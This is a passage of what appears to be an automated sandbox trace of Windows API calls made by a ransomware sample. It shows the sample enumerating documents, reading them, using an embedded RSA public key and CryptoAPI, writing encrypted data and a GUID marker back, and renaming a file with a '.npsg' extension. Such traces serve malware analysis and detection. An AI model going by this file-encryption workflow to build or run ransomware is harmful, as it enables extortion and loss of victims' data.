(HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x34092d8 [0237.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400650 [0237.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400680 [0237.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006e0 [0237.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400698 [0237.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0237.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0237.567] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400680 | out: hHeap=0x620000) returned 1 [0237.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400698 | out: hHeap=0x620000) returned 1 [0237.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006e0 | out: hHeap=0x620000) returned 1 [0237.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006e0 [0237.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0237.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400698 [0237.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0237.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400680 [0237.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b830 [0237.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0237.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0237.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0237.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0237.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400698 | out: hHeap=0x620000) returned 1 [0237.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400680 | out: hHeap=0x620000) returned 1 [0237.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0237.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006e0 | out: hHeap=0x620000) returned 1 [0237.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0237.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.568] GetCurrentThreadId () returned 0x5b4 [0237.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0237.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b82558 [0237.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0237.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0237.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0237.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.568] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x436b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.568] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0237.569] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.569] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.569] CloseHandle (hObject=0x644) returned 1 [0237.570] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\qrfDtUiJ12.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\qrfdtuij12.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\qrfDtUiJ12.pptx.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\qrfdtuij12.pptx.npsg")) returned 1 [0237.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.572] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0237.574] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x295f9520, ftCreationTime.dwHighDateTime=0x1d5b8e1, ftLastAccessTime.dwLowDateTime=0xeedcee50, ftLastAccessTime.dwHighDateTime=0x1d5bb03, ftLastWriteTime.dwLowDateTime=0xeedcee50, ftLastWriteTime.dwHighDateTime=0x1d5bb03, nFileSizeHigh=0x0, nFileSizeLow=0xe0c3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qWv5zMVx3eF_fs53v.odp", cAlternateFileName="QWV5ZM~1.ODP")) returned 1 [0237.574] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\qWv5zMVx3eF_fs53v.odp") returned=".odp" [0237.574] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\qWv5zMVx3eF_fs53v.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\qwv5zmvx3ef_fs53v.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.574] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=57539) returned 1 [0237.574] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.576] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xe09d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.577] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.578] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.578] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xe0c3, lpOverlapped=0x0) returned 1 [0237.579] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.579] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.579] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.579] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0237.580] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.580] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.580] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.580] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.580] GetLastError () returned 0x0 [0237.580] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.580] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0237.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.581] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.581] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.581] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0c0) returned 0x3b95d50 [0237.581] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0237.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0237.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0237.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x34092d8 [0237.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400650 [0237.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409320 [0237.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400668 [0237.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400698 [0237.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006f8 [0237.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006b0 [0237.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0237.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0237.582] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400698 | out: hHeap=0x620000) returned 1 [0237.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006b0 | out: hHeap=0x620000) returned 1 [0237.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006f8 | out: hHeap=0x620000) returned 1 [0237.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006f8 [0237.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0237.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34006b0 [0237.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400698 [0237.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b948 [0237.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0237.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7ba60 [0237.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0237.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0237.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006b0 | out: hHeap=0x620000) returned 1 [0237.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400698 | out: hHeap=0x620000) returned 1 [0237.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006f8 | out: hHeap=0x620000) returned 1 [0237.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0237.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.583] GetCurrentThreadId () returned 0x5b4 [0237.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0237.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b825e8 [0237.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0237.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0237.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0237.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0237.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0237.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.583] GetCurrentThreadId () returned 0x5b4 [0237.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0237.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0237.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0237.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0237.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006f8 [0237.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0237.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0237.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0237.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0237.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400698 [0237.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0237.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0237.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0237.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0237.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34006b0 [0237.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0237.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0237.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400680 [0237.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0237.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400710 [0237.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0237.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0237.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006e0 [0237.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006c8 [0237.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400728 [0237.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006c8 | out: hHeap=0x620000) returned 1 [0237.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34006c8 [0237.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006e0 | out: hHeap=0x620000) returned 1 [0237.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0237.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0237.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0237.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400698 | out: hHeap=0x620000) returned 1 [0237.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400698 [0237.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0237.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006f8 | out: hHeap=0x620000) returned 1 [0237.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0237.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400728 | out: hHeap=0x620000) returned 1 [0237.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0237.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7bb78 [0237.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0237.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0237.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400698 | out: hHeap=0x620000) returned 1 [0237.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fa10 [0237.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0237.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0237.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0237.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0237.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0237.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0237.586] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xe0c3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.586] WriteFile (in: hFile=0x644, 